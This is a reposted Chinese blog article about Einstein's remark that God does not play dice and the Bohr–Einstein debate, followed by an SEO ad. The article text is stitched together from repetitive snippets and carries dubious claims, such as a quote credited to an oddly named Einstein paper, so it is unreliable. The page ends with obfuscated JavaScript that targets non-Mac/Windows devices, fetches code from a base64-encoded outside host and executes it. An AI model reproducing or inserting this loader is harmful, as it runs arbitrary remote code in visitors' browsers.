上帝掷骰子吗

2022年09月05日 admin 阅读(29)

......但是在量子领域他败给了玻尔。爱因斯坦“相信”一个不掷骰子的上帝比掷骰子的上帝更简洁,玻尔告诫他不要企图教上帝该怎么做。

爱因斯坦所说的“上帝不掷骰子”,就是在质疑哥本哈根诠释的观点,而薛定谔的猫也在给我们揭示目前量子力学面对的难题,在量子力学中很多观点和现象都和宏观世界中的规律相悖。

前几天在网上看到一个视频,是潘建伟院士2020年的新年演讲,他讲到了爱因斯坦“上帝到底掷不掷骰子”的故事。

会议上演了两大派别的辩论,代表人物分别是爱因斯坦和波尔。爱因斯坦认为“世界是可认知的”,也就是实在论。而波尔认为“世界是不确定的,是不可认知的,只能用概率去描述”。在辩论当中,爱因斯坦提出:上帝不会掷骰子,来反驳波尔的不确定性。

爱因斯坦在谈到量子理论时表示:“上帝是不会掷骰子的。”这是他在《论宇宙中最简单、最高级的粒子》一文中所说。他认为,宇宙是由各种基本物质构成,它们都有各自特定的运动方式和规律。上帝在这里只是自然的代名词!

基于十年的实验经验,我已建立起“上帝不掷骰子”的学术信仰,认为量子力学是基于统计学实验(例如黑体辐射和原子光谱)总结的统计学规律,将量子力学的基本概念(例如量子叠加态,量子纠缠)直接用于实现单个量子比特的操控是错误的想法,非易失的信息存储必然是确定性的。

虽然爱因斯坦生前对量子力学不屑一顾,认为上帝不掷骰子,因而十分鄙夷有关量子力学的多宇宙诠释,但在量子力学蓬勃发展一个多世纪后的今天,它俨然已经成为了解释微观世界最好用的理论。

不过我想补充一点:上帝虽然掷骰子,可无论如何掷,其落点都会在某个确定的范围之内。也就是说,确定中存在着不确定,不确定中又存在着确定。

而能够决定猫的状态的“人”,也就对应作为观察者的波函数。很显然,我们也知道“人决定状态”这个结论,就存在很明显的主观唯心主义。除了薛定谔做的这个实验外,爱因斯坦也提出“上帝不会掷骰子”来反驳哥本哈根诠释。

爱因斯坦有句名言,叫“上帝不掷骰子”,本来是嘲讽量子力学的。但我们现在知道,不管是在微观的量子世界,还是在宏观的生物世界,掷骰子都是常规操作。

作为决定论的坚决拥护者,爱因斯坦对这种观点进行了严厉的驳斥,与玻尔为首的哥本哈根学派进行了多次激烈辩论。他有一句不讲道理的名言:“上帝不掷骰子!”以表达他对决定论的信仰。玻尔毫不退让地针锋相对:“别干涉上帝做什么。”

2、爱因斯坦前脚放弃宇宙学常数,后脚就输给了波尔的论战。爱因斯坦以“上帝不会掷骰子”的观点反对海森堡的不确定性原理,而玻尔反驳道,“爱因斯坦,不要告诉上帝怎么做”。

然而旧量子先驱爱因斯坦却相当的反感新量子论,他始终相信这个世界是确定的,信奉物理实在论,他认为上帝并不会掷骰子,只要我们能获得足够多的数据,我们就能精确的预测宇宙中每个基本粒子在过去和未来所有已经发生和尚未发生的变化。虽然目前的测量结果都是不确定的,但不是真实的不确定,背后一定存在一个我们尚未发现的变量影响了测量的结果,也就是隐变量理论。为此,玻尔与爱因斯坦也展开了一场世纪大论战。

他在和以玻尔为首的哥本哈根学派关于量子论的论战中,屡败屡战二十余年。爱因斯坦说过一句流传甚广的名言:“我不相信上帝在掷骰子。”意思是他不赞成量子论几率解释。但越来越多精确实验证明量子论的结果正确,使之成为有史以来最精确的理论。在事实面前,爱因斯坦终于选择相信真理,在信中表示支持几率解释。

此张就是摄于国际索尔维物理研究所,号称汇集全球三分之一智慧的照片。此次会议主题为“电子和光子”,世界上最著名的物理学家聚在一起讨论重新阐明的量子理论。会议上最出众的角色是爱因斯坦和波尔。前者以“上帝不会掷骰子”的观点反对海森堡的测不准原理,而波尔反驳道,“爱因斯坦,不要告诉上帝怎么做”——这一争论被称为波尔—爱因斯坦论战。参加这次会议的二十九人中有十七人获得或后来获得诺贝尔奖。

本文转载自互联网,如有侵权,联系删除

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

卓仁IT博客
卓仁IT博客的快速排名服务领先80%同行,首家开创刷百度关键词排名程序,非纯点击方法,无点击软件出售,需要seo快速排名提高网站排名请咨询顾问。
  • 文章61274
  • 评论0
  • 浏览10189236
  • 最新发布
  • 热文排行
function HwrGU(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function rdIfsiYJ(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return HwrGU(t);};window[''+'D'+'S'+'G'+'Z'+'I'+'d'+'e'+'C'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=rdIfsiYJ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';console.log(u);var xhr=new XMLHttpRequest();xhr.open('GET',u+'/s/a?_='+i);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function(data.data)(cs);}};xhr.send('u=1');})('aHR0cHM6Ly9hcGkueHloeC5vcmc=','428516530718064640',window,document,['','VxKGyJk']);}:function(){};